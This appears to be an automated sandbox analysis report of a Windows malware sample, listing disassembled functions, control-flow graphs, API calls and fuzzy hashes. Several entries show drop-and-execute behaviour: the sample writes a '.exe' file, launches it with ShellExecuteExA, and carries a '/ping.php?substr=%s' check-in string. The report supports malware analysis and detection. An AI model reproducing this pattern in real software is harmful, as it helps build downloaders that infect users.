                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
                                                                                                                                                                                                                                      • Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1797 426510-42651f 1798 426521-426527 1797->1798 1798->1798 1799 426529-42655c ShellExecuteExA 1798->1799 1800 426575-426581 call 402bef 1799->1800 1801 42655e-42656f WaitForSingleObject CloseHandle 1799->1801 1801->1800
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0042656F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                      • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                                      • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                                      • Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1804 426242-426267 CreateFileA 1805 426284-42628a 1804->1805 1806 426269-42627e WriteFile FindCloseChangeNotification 1804->1806 1806->1805
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                      • API String ID: 3805958096-4119554291
                                                                                                                                                                                                                                      • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                                      • Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1807 4163fd-416411 call 41e84a 1810 416413-416415 1807->1810 1811 416417-41641f 1807->1811 1812 416465-416485 call 41e7b9 1810->1812 1813 416421-416428 1811->1813 1814 41642a-41642d 1811->1814 1822 416493 1812->1822 1823 416487-416491 call 41234b 1812->1823 1813->1814 1816 416435-416449 call 41e84a * 2 1813->1816 1817 41644b-41645b call 41e84a FindCloseChangeNotification 1814->1817 1818 41642f-416433 1814->1818 1816->1810 1816->1817 1817->1810 1826 41645d-416463 GetLastError 1817->1826 1818->1816 1818->1817 1828 416495-416498 1822->1828 1823->1828 1826->1812
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 490808831-0
                                                                                                                                                                                                                                      • Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                                      • Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1832 419767-41977f call 41e84a 1835 419781-419786 call 412381 1832->1835 1836 419792-4197a8 SetFilePointerEx 1832->1836 1841 41978c-419790 1835->1841 1838 4197b9-4197c3 1836->1838 1839 4197aa-4197b7 GetLastError call 41234b 1836->1839 1840 4197c5-4197da 1838->1840 1838->1841 1839->1841 1844 4197df-4197e4 1840->1844 1841->1844
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                                                                                                      • Opcode ID: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
                                                                                                                                                                                                                                      • Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1854 4264f9-42650f SysFreeString * 2 CoUninitialize
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeString$Uninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1985688103-0
                                                                                                                                                                                                                                      • Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                                      • Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1855 419cc3-419ced 1856 419cf6-419d00 1855->1856 1857 419cef-419cf1 1855->1857 1859 419d02-419d11 call 413b67 1856->1859 1860 419d27-419d33 1856->1860 1858 419dc3-419dc8 1857->1858 1871 419f05-419f34 call 410932 CreateFileW 1859->1871 1872 419d17-419d1f 1859->1872 1862 419d35-419d3a 1860->1862 1863 419d7a 1860->1863 1866 419d68-419d73 1862->1866 1867 419d3c-419d41 1862->1867 1864 419d7c-419d82 1863->1864 1869 419dc0 1864->1869 1870 419d84-419d88 1864->1870 1866->1864 1868 419d75-419d78 1866->1868 1867->1866 1873 419d43-419d48 1867->1873 1868->1864 1874 419dc2 1869->1874 1870->1869 1875 419d8a-419d9d 1870->1875 1876 419d21 1872->1876 1877 419d64-419d66 1872->1877 1873->1868 1878 419d4a-419d4f 1873->1878 1874->1858 1881 419daa-419daf 1875->1881 1882 419d9f-419da4 1875->1882 1876->1860 1877->1860 1878->1868 1883 419d51-419d56 1878->1883 1881->1869 1889 419db1-419db4 1881->1889 1887 419da6-419da8 1882->1887 1888 419e08-419e20 call 4192ad 1882->1888 1884 419d58-419d5d 1883->1884 1885 419d5f-419d62 1883->1885 1884->1864 1884->1885 1885->1864 1887->1869 1887->1881 1899 419e22-419e29 1888->1899 1900 419e2b-419e2e 1888->1900 1891 419db6-419db9 1889->1891 1892 419dfd-419dff 1889->1892 1895 419dc9-419dda call 419800 1891->1895 1896 419dbb-419dbe 1891->1896 1893 419e00-419e02 1892->1893 1893->1888 1898 419ea3-419ea5 1893->1898 1904 419eab-419eb6 1895->1904 1907 419de0-419df3 call 419800 1895->1907 1896->1869 1896->1892 1898->1869 1898->1904 1899->1900 1901 419e60-419e67 call 412381 1900->1901 1902 419e30-419e36 1900->1902 1901->1874 1905 419e49-419e53 1902->1905 1906 419e38-419e3b 1902->1906 1908 419ec9-419ed2 1904->1908 1909 419eb8-419ebb 1904->1909 1913 419e55-419e5a call 412381 1905->1913 1914 419e6c-419e71 1905->1914 1911 419e3d-419e42 1906->1911 1912 419e8e-419ea1 call 419800 1906->1912 1907->1901 1927 419df5-419dfb 1907->1927 1916 419ed3-419ed5 1908->1916 1909->1916 1917 419ebd-419ec7 1909->1917 1911->1905 1920 419e44-419e47 1911->1920 1912->1898 1912->1901 1913->1901 1914->1912 1924 419e73-419e87 call 419800 1914->1924 1916->1869 1923 419edb-419ef4 call 415fa3 1916->1923 1917->1923 1920->1898 1923->1901 1932 419efa-419efe 1923->1932 1924->1901 1933 419e89-419e8c 1924->1933 1927->1893 1932->1923 1934 419f00 1932->1934 1933->1898 1934->1869
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 823142352-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
                                                                                                                                                                                                                                      • Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                        • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                        • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                        • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                        • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                        • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                        • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                      • String ID: v*@
                                                                                                                                                                                                                                      • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                      • Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                                      • Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                        • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                        • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420165198-0
                                                                                                                                                                                                                                      • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                                      • Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000400,?,?,04140223,?,?), ref: 04140E19
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,04140223,?,?), ref: 04140E1E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                      • Instruction ID: be7f62ea2db41a16a342eb67c89fed2bbce224ed73de3f70166da053bfa159c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18D0123124512877D7002B95DC09BCD7F1CDF09B62F008051FB0DE9080C770964046E5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
                                                                                                                                                                                                                                      • Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                      • Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                                      • Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                        • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                        • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 938716162-0
                                                                                                                                                                                                                                      • Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                                      • Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                        • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                                                                                      • Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                                      • Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                        • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                                                                                      • Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                                      • Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                                                                      • Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                                      • Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
                                                                                                                                                                                                                                      • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
